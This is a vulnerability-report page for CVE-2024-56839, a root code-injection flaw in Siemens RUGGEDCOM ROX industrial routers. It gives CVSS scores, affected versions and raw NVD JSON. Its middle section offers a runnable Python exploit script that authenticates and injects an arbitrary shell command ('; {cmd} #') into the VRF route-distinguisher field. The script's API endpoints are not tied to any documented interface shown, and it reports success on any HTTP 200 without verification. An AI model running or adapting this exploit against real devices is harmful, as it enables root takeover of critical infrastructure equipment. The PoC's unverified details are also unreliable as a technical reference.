Security Vulnerability Report
中文
CVE-2024-56839 CVSS 7.2 HIGH

CVE-2024-56839

Published: 2025-12-09 16:17:29
Last Modified: 2026-01-13 10:15:57
Source: [email protected]

Description

A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions < V2.17.0), RUGGEDCOM ROX MX5000RE (All versions < V2.17.0), RUGGEDCOM ROX RX1400 (All versions < V2.17.0), RUGGEDCOM ROX RX1500 (All versions < V2.17.0), RUGGEDCOM ROX RX1501 (All versions < V2.17.0), RUGGEDCOM ROX RX1510 (All versions < V2.17.0), RUGGEDCOM ROX RX1511 (All versions < V2.17.0), RUGGEDCOM ROX RX1512 (All versions < V2.17.0), RUGGEDCOM ROX RX1524 (All versions < V2.17.0), RUGGEDCOM ROX RX1536 (All versions < V2.17.0), RUGGEDCOM ROX RX5000 (All versions < V2.17.0). Code injection can be achieved when the affected device is using VRF (Virtual Routing and Forwarding). An attacker could leverage this scenario to execute arbitrary code as root user.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:siemens:ruggedcom_rox_ii_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:siemens:ruggedcom_rox_ii:-:*:*:*:*:*:*:* - NOT VULNERABLE
RUGGEDCOM ROX MX5000 < V2.17.0
RUGGEDCOM ROX MX5000RE < V2.17.0
RUGGEDCOM ROX RX1400 < V2.17.0
RUGGEDCOM ROX RX1500 < V2.17.0
RUGGEDCOM ROX RX1501 < V2.17.0
RUGGEDCOM ROX RX1510 < V2.17.0
RUGGEDCOM ROX RX1511 < V2.17.0
RUGGEDCOM ROX RX1512 < V2.17.0
RUGGEDCOM ROX RX1524 < V2.17.0
RUGGEDCOM ROX RX1536 < V2.17.0
RUGGEDCOM ROX RX5000 < V2.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2024-56839 PoC - RUGGEDCOM ROX VRF Code Injection Note: This PoC is for educational purposes only. Authorization required. """ import requests import argparse def exploit_vrf_injection(target_ip, username, password, cmd): """ Exploit CVE-2024-56839: VRF Code Injection in RUGGEDCOM ROX devices Prerequisites: - Valid administrator credentials - VRF feature must be enabled - Network access to the device management interface """ login_url = f"https://{target_ip}/api/login" vrf_url = f"https://{target_ip}/api/vrf/config" # Step 1: Authenticate with valid credentials session = requests.Session() login_data = { "username": username, "password": password } try: response = session.post(login_url, json=login_data, verify=False, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return False print("[+] Authentication successful") # Step 2: Inject malicious code through VRF parameter # The vulnerability allows command injection in VRF configuration inject_payload = f"; {cmd} #" vrf_data = { "vrf_name": "test_vrf", "rd": f"65000:100{inject_payload}", "description": "VRF configuration test" } response = session.post(vrf_url, json=vrf_data, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Payload sent successfully") print(f"[+] Command executed: {cmd}") return True else: print(f"[-] Exploitation failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2024-56839 PoC") parser.add_argument("-t", "--target", required=True, help="Target IP address") parser.add_argument("-u", "--username", required=True, help="Username") parser.add_argument("-p", "--password", required=True, help="Password") parser.add_argument("-c", "--command", default="id", help="Command to execute") args = parser.parse_args() exploit_vrf_injection(args.target, args.username, args.password, args.command)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-56839", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:29.297", "lastModified": "2026-01-13T10:15:57.237", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions < V2.17.0), RUGGEDCOM ROX MX5000RE (All versions < V2.17.0), RUGGEDCOM ROX RX1400 (All versions < V2.17.0), RUGGEDCOM ROX RX1500 (All versions < V2.17.0), RUGGEDCOM ROX RX1501 (All versions < V2.17.0), RUGGEDCOM ROX RX1510 (All versions < V2.17.0), RUGGEDCOM ROX RX1511 (All versions < V2.17.0), RUGGEDCOM ROX RX1512 (All versions < V2.17.0), RUGGEDCOM ROX RX1524 (All versions < V2.17.0), RUGGEDCOM ROX RX1536 (All versions < V2.17.0), RUGGEDCOM ROX RX5000 (All versions < V2.17.0). Code injection can be achieved when the affected device is using VRF (Virtual Routing and Forwarding). An attacker could leverage this scenario to execute arbitrary code as root user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:siemens:ruggedcom_rox_ii_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17.0", "matchCriteriaId": "FA424C03-CB17-4397-A09E-E02A78F8176C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:siemens:ruggedcom_rox_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "1EA04F52-40D0-4A4B-9767-265A26EFD98D"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-912274.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.